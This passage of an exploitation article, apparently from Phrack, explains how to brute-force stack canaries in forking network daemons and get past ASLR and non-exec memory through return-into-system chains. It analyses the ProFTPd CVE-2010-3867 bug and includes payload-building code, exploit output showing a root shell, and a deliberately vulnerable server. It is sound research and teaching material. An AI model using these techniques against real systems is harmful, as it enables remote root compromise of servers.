+device "/dev/urandom", read sizeof(uintptr_t) bytes and return them. 
+Otherwise of if this operation is not successful, a terminator canary is
+generated. First it put the value 0x00 in the variable ret. Next it changes
+two bytes to the value 0xFF and 0xa. Finally the terminator canary will 
+always be 0x00000aff.
+
+Now if we go to the definition of function _dl_setup_stack_chk_guard()
+for other operating systems we see:
+
+---------------------------------------------------------------------------
+	#include <stdint.h>
+	 
+	static inline uintptr_t __attribute__ ((always_inline))
+	_dl_setup_stack_chk_guard (void)
+	{
+	  uintptr_t ret = 0;
+	  unsigned char *p = (unsigned char *) &ret;
+	  p[sizeof (ret) - 1] = 255;
+	  p[sizeof (ret) - 2] = '\n';
+	  p[0] = 0;
+	  return ret;
+	}
+---------------------------------------------------------------------------
+
+So this function always generates a terminator canary value.
+
+Conclusion
+----------
+
+Either the canary is fully random and unpredictable (assuming /dev/urandom
+is safe which is a fair assumption) or it's constant and weak (weaker than
+stackguard) but nontheless troublesome in some kind of situations.
+
+The storage of its value is dependant on the TLS which itself is not at 
+fixed location (and the virtual address is never leaked in the code thanks
+to the segment selector trick) which means that it could hardly be leaked.
+
+
+---[ 3.3 - Exploiting canaries remotely
+
+Usually networks daemons create a new thread by calling clone() or a new 
+process by calling fork() to support a new connection. In the case of 
+fork() and depending on the daemon, the child process may or may not call 
+execve() which means that it will be in one the two situations:
+
+
+1. without execve()
+
+                                [mother]
+                      --------> accept()
+                      |            |
+                      |            | <- new connection
+                      |            |
+                      |          fork()
+                      |          |    |
+                      |   mother |    | child
+                      -----------|    |
+                                      |
+                                    read()
+                                      |
+                                     ...
+                                     ...
+
+2. with execve()
+                                [mother]
+                      --------> accept()
+                      |            |
+                      |            | <- new connection
+                      |            |
+                      |          fork()
+                      |          |    |
+                      |   mother |    | child
+                      -----------|    |
+                                      |
+                                   execve()
+                                      |
+                                      |
+                                    read()
+                                      |
+                                     ...
+                                     ...
+
+Note 1: OpenSSH is a good example of the second example.
+Note 2: Of course there is also the possibility that the server is using
+select() instead of accept(). In such case, there is of course no fork().
+
+As stated by the man page:
+
+*) the fork() system call creates a duplicate of the calling process which 
+means that father and child share a same canary as this is a 
+per-process-canary and not a per-function-canary mechanism. This is an 
+interesting property as if for each attempt we were able to guess a little 
+of the canary then with a finite number of guesses we would be successful.
+
+*) when execve() is called "text, data, bss, and stack of the calling 
+process are overwritten by that of the program loaded." This implies that 
+the canary is different for each child. As a result, being able to guess a 
+little of the child canary is most likely useless as this will result in a 
+crash and any result wouldn't be applicable to the next child.
+
+Considering 32-bits architecture, the number of possible canaries is up to 
+2^32 (2^24 on Ubuntu) which is around 4 billions (respectively 16 millions)
+which is impossible to test remotely while feasible locally in a few hours. 
+
+What should one do? Ben Hawkes [9] suggested an interesting method: brute 
+forcing with a byte-by-byte technique which is much more effective. When 
+can we use it? As we have mentioned, the canary does not change while 
+fork()'ing whereas with execve() it does. As a result guessing one byte 
+after an other requires that the fork() is not followed by an execve() 
+call.
+
+Here is the stack of the vulnerable function:
+
+| ..P.. | ..P.. | ..P.. | ..P.. | ..C.. | ..C.. | ..C.. | ..C.. |
+
+P - 1 byte of buffer
+C - 1 byte of canary
+
+First, we overwrite the first byte of canary and we check when the program 
+ends with an error and when does not. It could be done in several ways. 
+Hawkes proposed to estimate the program's answer time: whenever it misses 
+the canary's byte, the program ends immediately. When the canary's byte 
+matches, the program will still run, so its ending time is much longer than
+in the first case. We do not necessarily have to use that technique. It 
+often happens that after calling the function, the server (daemon) sends us
+back some responses as the result of an operation. All we need to do is to 
+check whether an expected data is received by the socket. If it is the 
+expected one, it means we've got the correct canary's byte and we can move 
+to the next one.
+
+Because 1 byte can have 256 different values at most, it becomes a relative
+calculus. Knowing the first byte's value, we have to guess 256 different 
+possibilities for the following bytes which means that the whole cookie 
+could be guessed in 4*256 = 1024 combinations which is reasonable.
+
+Here is the drawing of the four steps (each being a particular byte guess):
+
+First byte:
+| ..P.. | ..P.. | ..P.. | ..P.. | ..X.. | ..C.. | ..C.. | ..C.. |
+
+Second byte:
+| ..P.. | ..P.. | ..P.. | ..P.. | ..X.. | ..Y.. | ..C.. | ..C.. |
+
+Third byte:
+| ..P.. | ..P.. | ..P.. | ..P.. | ..X.. | ..Y.. | ..Z.. | ..C.. |
+
+Fourth byte:
+| ..P.. | ..P.. | ..P.. | ..P.. | ..X.. | ..Y.. | ..Z.. | ..A.. |
+
+
+When the attack is finished, we know that the canary's value is XYZA. With 
+this knowledge we are then able to continue the attack of the application. 
+Overwriting data, we put the canary's value in the canary's location. Since
+the canary is overwritten by its original value, the memory corruption is
+not detected.
+
+The easiest and simplest way to find the canary's location is nothing else 
+than testing. If we know that we can overwrite a 100 bytes buffer, we 
+actually send a fake packet with 101 bytes length and we check the answer 
+in the same way as we did while discussing theory of breaking the canary's
+value. If the program does NOT crash, it means that we have overwritten 
+something else than the canary with high probability (we could also have 
+overwritten the first byte of the canary with the correct value). 
+Continuing to increase the amount of overwritten bytes, the program will 
+finally stop running so we will know where the canary's value begins.
+
+Mitigation
+----------
+
+When will this technique not work? Every time we can't fully control the 
+overwritten bytes. For example you may not be able to control the last 
+character of your buffer or you may be have to deal with filtering (if NULL
+bytes are prohibited then it's over).
+
+A good example of such a situation is the latest pre-auth ProFTPd bug 
+(CVE-2010-3867) discovered by TJ Saunders. The bug lies in the parsing of 
+TELNET_IAC chars because of miscalculated end of reading loop. Let's look 
+at this bug closer.
+
+The problem lies in the function pr_netio_telnet_gets() from the file 
+"src/netio.c":
+
+---------------------------------------------------------------------------
+	char *pr_netio_telnet_gets(char *buf, size_t buflen,
+	    pr_netio_stream_t *in_nstrm, pr_netio_stream_t *out_nstrm) {
+	  char *bp = buf;
+
+	...
+
+  [L1]  while (buflen) {
+
+  ...
+
+	      toread = pr_netio_read(in_nstrm, pbuf->buf,
+	      (buflen < pbuf->buflen ?  buflen : pbuf->buflen), 1);
+  ...
+
+  [L2]    while (buflen && toread > 0 && *pbuf->current != '\n' 
+          && toread--) {
+  ...
+	          if (handle_iac == TRUE) {
+	            switch (telnet_mode) {
+	              case TELNET_IAC:
+            	    switch (cp) {
+
+  ...
+  ...
+
+            	      default:
+
+  ...
+
+                    	*bp++ = TELNET_IAC;
+  [L3]                  buflen--;
+
+            	        telnet_mode = 0;
+            	        break;
+                	}
+  ...
+	            }
+	          }
+          
+              *bp++ = cp;
+  [L4]        buflen--;
+	        }
+  ...
+  ...
+	        *bp = '\0';
+	        return buf;
+        }
+    }
+---------------------------------------------------------------------------
+
+The loop [L2] reads and parses the bytes. Each time it decrements buflen 
+[L4]. A problem exists when TELNET_IAC character comes (0xFF). When this 
+character occurs in the parsing buflen is decremented [L3]. As a result in 
+this situation, buflen is decremented by 2 which is perfect to bypass an 
+inappropriate check in [L1]. Indeed, when buflen == 1 if the parsed 
+character is TELNET_IAC then buflen = 1 - 2 = -1. As a result, the 
+"while (buflen && " condition of [L1] holds and the copy continues (until 
+an '\n' is found).
+
+The function pr_netio_telnet_gets() is called by function pr_cmd_read() 
+from file "src/main.c":
+
+---------------------------------------------------------------------------
+	int pr_cmd_read(cmd_rec **res) {
+	  static long cmd_bufsz = -1;
+	  char buf[PR_DEFAULT_CMD_BUFSZ+1] = {'\0'};
+
+	...
+
+	  while (TRUE) {
+
+	...
+
+	    if (pr_netio_telnet_gets(buf, sizeof(buf)-1, session.c->instrm,
+	        session.c->outstrm) == NULL) {
+
+	...
+
+	  }
+
+	...
+	...
+
+	  return 0;
+	}
+---------------------------------------------------------------------------
+
+In this case the argument for the vulnerable function is a local buffer on 
+the stack. So this is a classical stack buffer overflow bug. In theory all 
+conditions are met to bypass pro-police canary using the byte-by-byte 
+technique. But if we look closer to the vulnerable function we see this 
+code:
+
+	  *bp = '\0';
+
+... which break the idea of using a byte-by-byte attack. Why? Because we 
+can never control the last overflowed byte which is always 0x00, only the 
+penultimate.
+
+Additionally, the 'byte-by-byte' method requires that all children have a 
+same canary. This is not possible if the children are calling execve() as 
+explained earlier. In such a situation, a bruteforce attack is quite 
+unlikely to succeed. Of course we could try to guess 3 bytes each time if 
+we had a lot of time... but it would means a one shot attack afterward 
+since multiplying the complexity of both attempts would require too much 
+time.
+
+Finally, grsecurity provides an interesting security feature to prevent 
+this kind of exploitation. Considering the fact that the bruteforce will 
+necessarily result in the crash of children, then a child dying with SIGILL
+(such as if PaX killed it for example) is highly suspicious. As a result, 
+while in do_coredump() the kernel set a flag in the parent process using 
+the gr_handle_brute_attach() function. The next forking attempt of the 
+parent will then be delayed. Indeed in do_fork() the task is set in the 
+TASK_UNINTERRUPTIBLE state and put to sleep for (at least) 30s.
+
+---------------------------------------------------------------------------
++void gr_handle_brute_attach(struct task_struct *p)
++{
++#ifdef CONFIG_GRKERNSEC_BRUTE
++	read_lock(&tasklist_lock);
++	read_lock(&grsec_exec_file_lock);
++	if (p->p_pptr && p->p_pptr->exec_file == p->exec_file)
++		p->p_pptr->brute = 1;
++	read_unlock(&grsec_exec_file_lock);
++	read_unlock(&tasklist_lock);
++#endif
++	return;
++}
++
++void gr_handle_brute_check(void)
++{
++#ifdef CONFIG_GRKERNSEC_BRUTE
++	if (current->brute) {
++		set_current_state(TASK_UNINTERRUPTIBLE);
++		schedule_timeout(30 * HZ);
++	}	
++#endif
++	return;
++}
+---------------------------------------------------------------------------
+
+While this mechanism has its limit (SIGILL is the only signal to trigger 
+the delay), it proves itself effective to slow down an attacker.
+
+
+--[ 4 - A few words about the other protections
+
+When the daemon is forking without calling execve() we can bypass SSP 
+because we can discover the "random" value of the canary, but we still have
+to deal with non-exec memory and ASLR. 
+
+Executable Space Protection
+---------------------------
+
+The 10th of August 1997 Solar Designer's post in bugtraq mailing list 
+introduced the ret-into-libc attack which allows to bypass non-exec memory 
+restriction [11]. The technique was later enhanced by nergal in his phrack 
+paper [10] in which he introduced many new and now well known concepts 
+still in use nowadays such as:
+
+    *) Chaining. The consecutive call of several functions. [10] describes
+       the necessary stack layout to perform such a thing on x86. The 
+       concept was later extended to other architectures and "gadgets" 
+       (ROP) were introduced. 
+
+    *) The use of mprotect() which was introduced as a counter measure 
+       against PaX and still effective on some systems (though not on PaX 
+       itself).
+
+    *) dl-resolve() which allows to call functions of the shared library 
+       even when they don't have an entry in the PLT.
+
+Ok - so we know the technique that we should use to bypass non-executable 
+memory but we still have a few problems. We don't know the address of the 
+function that should be called (typically a system()-like) and the address 
+of the argument(s) for this function. 
+
+At that point as an attacker you may have three solutions:
+
+    *) You can try to bruteforce. Obviously and as stated many times, you 
+       should only bruteforce the strict necessary which is usually an 
+       offset from which you can deduce the missing addresses. Interesting 
+       information though a bit outdated on how you could perform this are 
+       given in [12].
+
+    *) You find some way to perform an info leak. Depending on the 
+       situation this can be tricky (though not always) especially on 
+       modern systems where daemons are often compiled as PIE binaries. For
+       example on recent Ubuntu, by default most daemons are PIE binaries. 
+       As a result, it's no more possible to use fixed address in the 
+       code/data segment of the program.
+
+    *) You can exploit the memory layout to find some clever way to reduce 
+       the amount of parameters to guess. Depending on the context, a deep 
+       study of the program may be necessary.
+
+The important thing to remember is that there is no generic technique, a 
+clever bug exploitation is highly dependant of the context induced by the
+program itself. This is especially true with modern memory protections.
+
+ASLR: Taking advantage of fork()
+--------------------------------
+
+As explained earlier the address space of the child process is a copy of 
+its parent. However this is no longer the case if the child performs an 
+execve() as the process is then completely reloaded and the address space
+is then totally unpredictable because of the ASLR.
+
+From a mathematical point of view, guessing an address is a: 
+    - sampling without replacement (in fork() only situations)
+    - sampling with replacement (in fork() followed by execve() situation)
+
+In the case of PIE network daemons, you have at least two distincts sources
+of entropy:
+
+    *) the cookie: 24 bits or 32 bits on 32 bit OS
+    *) the ASLR: 16 bits for mmap() randomization with PaX (in PAGEEXEC 
+       case) on 32 bit OS
+
+(Last claim is proved by the following patch extract)
+
+---------------------------------------------------------------------------
++#ifdef CONFIG_PAX_ASLR
++	if (current->mm->pax_flags & MF_PAX_RANDMMAP) {
++		current->mm->delta_mmap = (pax_get_random_long() 
+                & ((1UL << PAX_DELTA_MMAP_LEN)-1)) << PAGE_SHIFT;
++		current->mm->delta_stack = (pax_get_random_long() 
+                & ((1UL << PAX_DELTA_STACK_LEN)-1)) << PAGE_SHIFT;
++	}
++#endif
+
++#define PAX_DELTA_MMAP_LEN	(current->mm->pax_flags 
+                                & MF_PAX_SEGMEXEC ? 15 : 16)
++#define PAX_DELTA_STACK_LEN	(current->mm->pax_flags 
+                                & MF_PAX_SEGMEXEC ? 15 : 16)
+---------------------------------------------------------------------------
+
+Note: ET_DYN object randomization is performed using the delta_mmap offset.
+We will see in chapter 5 that we need to guess this parameter.
+
+Now the main idea is that without execve() the expected number of trials to
+perform the attack is the sum of the number of attempts required to guess 
+the canary and the memory layout. With execve() it's their product. 
+
+Example:
+
+    Exploiting the proftpd bug on an Ubuntu 10.04 + PaX with: 
+        - no byte-by-byte
+        - no execve()
+        - cookie has a null byte
+        - binary is compiled as PIE
+
+It should require an average of 2^24 + 2^16 attempts (if binary is PIE). 
+From a complexity point of view, we could say that guessing both values is 
+as hard as guessing the cookie.
+
+Note: Last minute update. It seems that proftpd is not compiled as PIE in 
+common distributions/Unix (according to many exploits targets). 
+
+
+---[ 5. Hacking the PoC
+
+As a proof of these scribbles let's study and exploit an example of a 
+vulnerable server (complete code is in appendix). A trivial stack overflow
+was emulated in the following function:
+
+---------------------------------------------------------------------------
+int vuln_func(char *args, int fd, int ile) {
+
+    char buf[100];
+    memset(buf, 0, sizeof buf);
+
+    if ( (strncmp(args,"vuln",4)) == 0) {                     [L1]
+#ifdef __DEBUG
+        stack_dump("BEFORE", buf);                            [L2]
+#endif
+        write(fd,"Vuln running...\nCopying bytes...",32);
+        memcpy(buf,args+5,ile-5);                             [L3]
+#ifdef __DEBUG
+        stack_dump("AFTER", buf);                             [L4]
+#endif
+        write(fd,"\nDONE\nReturn to the main loop\n",30);     [L5]
+        return 1;
+    }
+
+    else if ( (strncmp(args,"quit",4)) == 0) {
+        write(fd,"Exiting...\n",11);
+        return 0;
+    }
+
+    else {
+        write(fd,"help:\n",6);
+        write(fd," [*] vuln <args>\n",17);
+        write(fd," [*] help\n",10);
+        write(fd," [*] quit\n",10);
+        return 1;
+    }
+}
+---------------------------------------------------------------------------
+
+Let's analyze a bit this function:
+
+    *) The bug is triggered when an attacker supplies a "vuln XXXXX" with 
+       a large enough "XXXXX" (> 100 bytes). [L1, L3]
+
+    *) The attacker is fully able to control his payload without 
+       restrictions (no payload filtering, no overflow restriction)  
+
+    *) When the overflow takes place, we possibly overwrite some local 
+       variables which may induce a bug in [L5] and possibly crash the 
+       program.
+
+Note: Because of the fork(), debugging can be tedious. As a result I added
+a function to leak the stack layout in a file both before and after the 
+overflow.
+
+The program was compiled with -fstack-protector-all and -fpie -pie which
+means that we will have to exploit the program with:
+    
+    *) Non exec + full ASLR (code and data segments are also randomized)
+    *) Stack canary
+    *) Ascii armored protection
+
+Depending on the Unix target, some of these protections may or may not be 
+effective. However we will assume that they are all activated.
+
+Taking advantage of fork()
+--------------------------
+
+The first process of the exploitation is obviously to guess the stack 
+cookie. As said earlier, fork() will grant us children with the same 
+address space. As a result we will be able to guess the cookie with the 
+technique described in 3.3 which allows us to arbitrary overwrite anything
+(including of course the saved EIP).
+
+In a second time, we need to find an address in which returning. One of the
+best solution is to return into a function of the .text which would 
+generate some network activity. However the server is a PIE binary thus an 
+ET_DYN ELF object. As a result, the address of this function has to be 
+guessed.
+ 
+Now assuming that we have the original binary (fair assumption), the offset
+of the function is known which means that we only need to bruteforce the 
+load address of the ELF object. Since such an address is aligned on 
+PAGE_SIZE basis, on a 32bits architecture the 12 less significant bits are
+all 0.
+
+For example consider the following code:
+
+    10be:       e8 fc ff ff ff          call   10bf <main+0x2f3>    
+    10c3:       c7 44 24 08 44 00 00    movl   $0x44,0x8(%esp)
+      ^^----------------------- last byte value. not randomised at all
+     ^------------------------- last half value. bottom nibble is not 
+				                randomised
+
+Additionally if Ascii Armour protection is used, the most significant byte
+of the address will be 0x00 (something which does not happen under PaX).
+
+The conclusion is that the amount to bruteforce is so small that it can be
+done in a couple of seconds/minutes through the network.
+
+Studying the stack layout
+--------------------------
+
+Thanks to our debugging function, it's easy to see the stack layout when 
+the crash occurs. Here is the layout on an Ubuntu 10.04 before the 
+overflow:
+
+        bfa38648: 00000000 00000000 00000000 00000000
+        bfa38658: 00000000 00000000 00000000 00000000
+        bfa38668: 00000000 00000000 00000000 00000000
+        bfa38678: 00000000 00000000 00000000 00000000
+        bfa38688: 00000000 00000000 00000000 00000000
+        bfa38698: 00000000 00000000 00000000 00000000
+        bfa386a8: 00000000 8c261700 00000004 005cdff4
+        bfa386b8: bfa387f8 005cbec1 bfa386f4 00000004
+        bfa386c8: 0000005f 00000000 00258be0 00257ff4
+        bfa386d8: 00000000 0000005f 00000003 00000004
+        bfa386e8: 0000029a 00000010 00000000 6e6c7576
+
+We can thus see that:
+
+    *) The cookie (0x8c261700) is at 0xbfa386ac.
+    *) The return address is 0x005cbec1
+    *) The argument of vuln_func() are (0xbfa386f4, 0x4 and 0x5f)
+
+There is a really nice way to take advantage of this situation. If we chose
+to return into the 'call vuln_func()' instruction then the arguments will 
+be reused and the function replayed which will generate the needed network
+flow to detect the right value of the base address. Here is the C code 
+building our payload:
+
+        addr_callvuln = P_REL_CALLVULN + (base_addr << 12);
+
+        *(buf_addr++) = canary; 
+        *(buf_addr++) = addr_callvuln;  // <-- dummy
+        *(buf_addr++) = addr_callvuln;  // <-- dummy
+        *(buf_addr++) = addr_callvuln;  // <-- dummy 
+        *(buf_addr++) = addr_callvuln;  // <-- ret-into-callvuln!
+
+Note: Overwriting the next 4 bytes (args) with addr_callvuln is also 
+possible. Depending on the situation (whether you have the binary or not), 
+it can be an option to help with the bruteforce.
+
+Returning-into-system
+---------------------
+
+Now the idea is to get the shell. Since we know the load address, the only
+thing that needs to be done is to call a function which will give us a 
+shell. Again this is very specific to the daemon that you need/want to 
+exploit but in this case, I exploited the use of system(). Indeed in the 
+code you can find:
+
+
+    c8d:       e8 d6 fb ff ff          call   868 <system@plt>
+
+     ^-------------------------------  cool offset
+
+One may object that there is also the system parameter to find but "args" 
+is on the stack and pointing to a user controlled buffer which means that 
+we can do a return-into-callsystem(args).
+
+Note: In this case we were lucky (it was not done on purpose!) but the 
+following situation could also have occurred:
+
+             int vuln_func(int fd, char *args, int ile);
+
+In this case, the layout would be...
+
+                               [   ....  ]
+                               [ old_ebp ]
+                               [ old_eip ]
+                               [   fd    ]
+                               [   args  ]
+                               [   ile   ]
+                               [   ....  ]
+
+This would make no difference as we could use a return-into-ret and 
+overwrite fd with callsystem. An other solution would be to deduce the 
+address of the system() entry in the PLT and to call it as its first 
+argument would be "args" (classical return-into-func).
+
+Note: It may happen in real life situation that you have no stack address
+at disposal. Thus there are 2 solutions:
+
+    *) You bruteforce this address. It's lame. But sometimes you have no
+       other options (like when the overflow is limited which restricts 
+       your ability to performed chained return-into-*.
+
+    *) You create a new stack frame somewhere in the .data section. Knowing
+       the loading address of the ELF object, it's easy to locate the .data
+       section. You would thus be able to create a whole fake stack frame 
+       using a chained return-into-read(fd, &newstack_in_data, len) and 
+       then finally switch the stack using a leave-ret sequence. Fun and 
+       100% cool.
+
+It that all? Not quite. We need to be sure that we will be able to reach 
+the 'ret' before crashing. Let's have a look at the epilogue of the 
+function:
+
+objdump --no-show-raw-insn -Mintel -d ./s 
+
+
+     fb1:       call   8f8 <memcpy@plt>     
+     fb6:       lea    eax,[ebp-0x70]               ; the overflow occurred
+     fb9:       mov    DWORD PTR [esp+0x4],eax
+     fbd:       lea    eax,[ebx-0x1bdf]
+     fc3:       mov    DWORD PTR [esp],eax
+     fc6:       call   10ca <stack_dump>
+     fcb:       mov    DWORD PTR [esp+0x8],0x1e
+     fd3:       lea    eax,[ebx-0x1bd8]
+     fd9:       mov    DWORD PTR [esp+0x4],eax
+     fdd:       mov    eax,DWORD PTR [ebp+0xc]      ; we control the fd
+     fe0:       mov    DWORD PTR [esp],eax
+     fe3:       call   878 <write@plt>
+     fe8:       mov    eax,0x1
+     fed:       jmp    10b0 <vuln_func+0x1b1>
+
+    [...]
+
+    10b0:       mov    edx,DWORD PTR [ebp-0xc]
+    10b3:       xor    edx,DWORD PTR gs:0x14
+    10ba:       je     10c1 <vuln_func+0x1c2>
+    10bc:       call   1280 <__stack_chk_fail_local>
+    10c1:       add    esp,0x94
+    10c7:       pop    ebx                          ; interesting
+    10c8:       pop    ebp
+    10c9:       ret    
+
+The deadlisting is quite straightforward. The only local variable that is
+trashed is the fd used by write(). Does it matter? No. In the worst case,
+the write() will return an EBADF error.
+
+What about the ebx register? Well as a matter of fact, it is important to
+restore its value since it's a PIE. Indeed ebx is used as a global address:
+
+    00000868 <system@plt>:
+     868:   jmp    DWORD PTR [ebx+0x20]  ; ebx is pointing on the PLT 
+                                         ; (.got.plt)
+     86e:   push   0x28
+     873:   jmp    808 <_init+0x30>
+
+It's no big deal since the address of the .got.plt section is exactly:
+load_addr + the memory offset (cf. readelf -S). Here is the final stack 
+frame:
+
+    *(buf_addr++) = 0x00000004;
+    *(buf_addr++) = (P_REL_GOT + (base_addr << 12));  // used by the GOT.
+    *(buf_addr++) = 0x41414141;
+    *(buf_addr++) = system_addr;
+                                      // <-- Here is the buffer address 
+
+
+When there is no system()
+-------------------------
+
+The previous situation was a bit optimistic. Indeed when system() is not
+used in the program, there is obviously no "call system" instruction (and
+no corresponding PLT entry either). But it's no big deal a 
+return-into-write-like() function is always possible as illustrated below:
+
+    *(buf_addr++) = 0x00000004;
+    *(buf_addr++) = (P_REL_GOT + (base_addr << 12));
+    *(buf_addr++) = 0x41414141;
+    *(buf_addr++) = write_addr;  // retun into call_write(fd, buf, count)
+    *(buf_addr++) = 0x00000004;  // fd
+    *(buf_addr++) = some_addr;   // buf
+    *(buf_addr++) = 0x00000005;  // count
+
+With such a primitive it's easy to info leak anything needed. This could
+allow you to perform a return-into-dl-resolve() as illustrated in [10]. The
+implementation of this technique with the PoC exploit is left as an 
+exercise for the reader.
+
+Final algorithm
+---------------
+
+So in the end the final algorithm is:
+
+1) Looking for the distance needed to reach the canary of the death
+2) Finding the value of this canary using a 'byte-by-byte' brute force 
+   method
+3) Using the value of this canary to legitimate overflows, we should start 
+   finding the code segment by returning in a function leaking information.
+4) Deducing everything needed using the load address
+5) Build a new chained return-into-* attack and get the shell! 
+
+And it should give you something like that:
+
+---------------------------------------------------------------------------
+[root@pi3-test phrack]# gcc s.c -o s -fpie -pie -fstack-protector-all
+[root@pi3-test phrack]# ./s
+start
+
+Launched into background (pid: 32145)
+
+[root@pi3-test phrack]#
+...
+...
+child 32106 terminated
+sh: vuln: nie znaleziono polecenia
+
+
+[pi3@pi3-test phrack]$ gcc moj.c -o moj
+[pi3@pi3-test phrack]$ ./moj -v 127.0.0.1
+
+        ...::: -=[ Bypassing pro-police PoC for server by Adam 'pi3 
+(pi3ki31ny)' Zabrocki ]=- :::...
+
+        [+] Trying to find the position of the canary...
+        [+] Found the canary! => offset = 101 (+11)
+        [+] Trying to find the canary...
+        [+] Found byte! => 0x8e
+        [+] Found byte! => 0x17
+        [+] Found byte! => 0xa4
+        [+] Found byte! => 0xd7
+        [+] Overwriting frame pointer (EBP?)...
+        [+] Overwriting instruction pointer (EIP?)...
+        [+] Starting bruteforce...
+        [+] Success! :) (0x110eee0a)
+                -> @call_write = 0x110eed6c
+                -> @call_system = 0x110eeb9b
+        [+] Trying ret-into-system...
+        [+] Connecting to bindshell...
+
+pi3 was here :-)
+Executing shell...
+
+uid=0(root) gid=0(root) 
+grupy=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
+Linux pi3-test 2.6.32.13-grsec #1 SMP Thu May 13 17:07:21 CEST 2010 i686 
+i686 i386 GNU/Linuxexit;
+---------------------------------------------------------------------------
+
+The demo exploit can be found in the appendix. It was tested on many 
+systems including:
+
+    *) Linux (Fedora 10, Fedora 11, Fedora 12)
+    *) Linux with PaX patch (2.6.32.13-grsec)
+    *) OpenBSD (4.4, 4.5, 4.6)
+    *) FreeBSD (7.x)
+
+
+---[ 6 - Conclusion
+
+Due to modern protections, classical methods of exploitation may or may not
+be sufficient to exploit remote stack overflows. We saw that in the context
+of fork()-only daemons a few conditions were sometimes sufficient for that 
+purpose.
+
+At this moment I want to send some greetings... I know it is lame and
+unprofessional ;)
+
+ -> Ewa - moja kochana dziewczyna ;)
+ -> Akos Frohner, Tomasz Janiczek, Romain Wartel - you are good friends ;)
+ -> snoop, phunk, thorkill, Piotr Bania, Gynvael Coldwind, andrewg, and 
+    #plhack@IRCNET
+
+"... opetani samotnoscia..."
+
+Best regards Adam Zabrocki. - "Ja tylko sprzatam..."
+
+
+---[ 7 - References
+
+ [1] http://phrack.org/issues.html?issue=56&id=5#article
+ [2] The Shellcoder's Handbook - Chris Anley, John Heasman, 
+     Felix "FX" Linder, Gerardo Richarte
+ [4] http://marc.info?m=97288542204811
+ [5] http://pax.grsecurity.net
+ [6] http://www.trl.ibm.com/projects/security/ssp/
+ [7] http://gcc.gnu.org/gcc-4.1/changes.html
+ [8] http://xorl.wordpress.com/2010/10/14/linux-glibc-stack-canary-values/
+ [9] http://sota.gen.nz/hawkes_openbsd.pdf
+[10] http://www.phrack.org/issues.html?issue=58&id=4
+[11] http://seclists.org/bugtraq/1997/Aug/63
+[12] http://phrack.org/issues.html?issue=59&id=9#article
+[13] http://www.phrack.org/issues.html?issue=63&id=14
+
+---[ 8 - Appendix - PoC
+
+
+---[ 8.1 - The server (s.c)
+
+----------------------------------- CUT -----------------------------------
+/*
+ * This is simple server which is vulnerable to stack overflow attack.
+ * It was written for demonstration of the remote stack overflow attack in 
+ * modern *NIX systems - bypass everything - ASLR, AAAS, ESP, SSP 
+ * (ProPolice).
+ *
+ * Best regards,
+ * Adam Zabrocki
+ * --
+ * pi3 (pi3ki31ny) - pi3 (at) itsec pl
+ * http://pi3.com.pl
+ *
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <errno.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <signal.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+#define PORT 666
+#define PIDFILE "/var/run/vuln_server.pid"
+#define err_sys(a) {printf("%s[%s]\n",a,strerror(errno));exit(-1);}
+#define SA struct sockaddr
+
+#define SRV_BANNER "Some server launched by root user\n"
+
+int vuln_func(char *, int, int);
+void stack_dump(char *, char *);
+void sig_chld(int);
+
+int main(void) 
+{
+
+    int status,dlugosc,port=PORT,connfd,listenfd,kupa;
+    struct sockaddr_in serv,client;
+    char buf[200];
+    pid_t pid;
+    FILE *logs;
+
+    if ( (listenfd=socket(PF_INET, SOCK_STREAM, 0)) < 0)
+        err_sys("Socket() error!\n");
+
+    bzero(&serv,sizeof(serv));
+    bzero(&client,sizeof(client));
+    serv.sin_family = PF_INET;
+    serv.sin_port = htons(port);
+    serv.sin_addr.s_addr=htonl(INADDR_ANY);
+
+    if ( (bind(listenfd,(SA*)&serv,sizeof(serv))) != 0 )
+        err_sys("Bind() error!\n");
+
+    if ((listen(listenfd,2049)) != 0)
+        err_sys("Listen() error!\n");
+
+    system("echo start");
+    status=fork();
+    if (status==-1) err_sys("[FATAL]: cannot fork!\n");
+    if (status!=0) {
+        logs=fopen(PIDFILE, "w");
+        fprintf(logs,"pid = %u",status);
+        printf("\nLaunched into background (pid: %d)\n\n", status);
+        fclose(logs);
+        logs=NULL;
+        return 0;
+    }
+
+    status=0;
+    signal (SIGCHLD,sig_chld);
+
+    for (;;) {
+        
+        dlugosc = sizeof client;
+
+        if((connfd=accept(listenfd,(SA*)&client,(socklen_t *)&dlugosc))< 0)
+            err_sys("accept error !\n");
+
+        if ( (pid=fork()) == 0) {
+
+            if ( close(listenfd) !=0 )
+                err_sys("close error !\n");
+
+            write(connfd, SRV_BANNER, strlen(SRV_BANNER));
+
+            for (;;) {
+                bzero(buf,sizeof(buf));
+                kupa = recv(connfd, buf, sizeof(buf), 0);
+                if ( (vuln_func(buf,connfd, kupa)) != 1)
+                    break;
+            }
+            
+            close(connfd);
+            exit(0);
+        }
+        else
+            close(connfd);        
+    }
+}
+
+int vuln_func(char *args, int fd, int ile) {
+
+    char buf[100];
+    memset(buf, 0, sizeof buf);
+
+    if ( (strncmp(args,"vuln",4)) == 0) {
+#ifdef __DEBUG
+        stack_dump("BEFORE", buf);
+#endif
+        write(fd,"Vuln running...\nCopying bytes...",32);
+        memcpy(buf,args+5,ile-5);
+#ifdef __DEBUG
+        stack_dump("AFTER", buf);
+#endif
+        write(fd,"\nDONE\nReturn to the main loop\n",30);
+        return 1;
+    }
+
+    else if ( (strncmp(args,"quit",4)) == 0) {
+        write(fd,"Exiting...\n",11);
+        return 0;
+    }
+
+    else {
+        write(fd,"help:\n",6);
+        write(fd," [*] vuln <args>\n",17);
+        write(fd," [*] help\n",10);
+        write(fd," [*] quit\n",10);
+        return 1;
+    }
+}
+
+void stack_dump(char *header, char *buf)
+{
+    int i;
+    unsigned int *p = (unsigned int *)buf;
+    FILE *fp;
+
+    fp=fopen("./dupa.txt","a");
+    fprintf(fp,"%s\n",header);
+
+    for (i=0;i<240;)
+    {
+        fprintf(fp,"%.8x: %.8x %.8x %.8x %.8x\n", (unsigned int)p, 
+        *p, *(p+1), *(p+2), *(p+3));
+        p += 4;
+        i += sizeof(int) *4;
+    }
+    fprintf(fp,"\n");
+    fclose(fp);
+    return;
+}
+
+void sig_chld(int signo) 
+{
+
+    pid_t pid;
+    int stat;
+
+    while ( (pid = waitpid(-1, &stat, WNOHANG)) > 0)
+        printf("child %d terminated\n",pid);
+    return;
+}
